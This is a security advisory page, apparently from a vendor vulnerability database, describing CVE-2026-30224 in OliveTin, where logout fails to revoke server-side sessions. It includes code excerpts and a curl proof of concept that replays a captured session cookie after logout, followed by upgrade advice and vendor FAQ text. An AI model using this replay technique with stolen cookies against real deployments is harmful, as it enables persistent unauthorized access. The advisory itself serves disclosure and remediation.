Summary
OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).
An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.
This is a session management flaw that violates expected logout semantics.
Details
During logout:
// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())
However, the server still accepts the session:
session := sessionStorage.Providers[provider].Sessions[sid]
...
return session
The SID is not deleted from sessionStorage.
Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).
File: api.go, sessions.go, local.go
Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47
Behavior
- Login → receive SID cookie
- Logout → cookie cleared client-side
- Replay old SID manually → still authenticated
Expected:
- Logout invalidates session immediately
Actual:
- Old SID remains usable until expiry
PoC
Minimal config
listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true
authLocalUsers:
enabled: true
users:
- username: low
usergroup: users
password: "$argon2id$..."
actions:
- title: Dummy
id: dummy
shell: "echo dummy"
Reproduction
Login and capture SID:
LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
-H 'Content-Type: application/json' \
-d '{"username":"low","password":"lowpass"}')
SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')
Works before logout:
curl -X POST http://localhost:16642/api/WhoAmI \
-H "Cookie: olivetin-sid-local=$SID"
Logout:
curl -X POST http://localhost:16642/api/Logout \
-H "Cookie: olivetin-sid-local=$SID"
Replay old cookie:
curl -X POST http://localhost:16642/api/WhoAmI \
-H "Cookie: olivetin-sid-local=$SID"
Result
User is still authenticated after logout.
Session Management Flaw
- Logout Bypass
- Session Replay
Risk:
- Stolen cookies remain valid
- Persistent unauthorized access
- Users falsely believe logout ended the session
Attack scenarios:
- Shared computers
- XSS/session theft
- Proxy logs
- Malware/browser compromise
Impact
Type:
CVE-2026-30224 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260304233115-d6a0abc3755d15); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-30224? CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.
- How severe is CVE-2026-30224? CVE-2026-30224 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30224? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260304233115-d6a0abc3755d15 is affected.
- Is there a fix for CVE-2026-30224? Yes. CVE-2026-30224 is fixed in 0.0.0-20260304233115-d6a0abc3755d15. Upgrade to this version or later.
- Is CVE-2026-30224 exploitable, and should I be worried? Whether CVE-2026-30224 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-30224 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-30224? Upgrade
github.com/OliveTin/OliveTinto 0.0.0-20260304233115-d6a0abc3755d15 or later.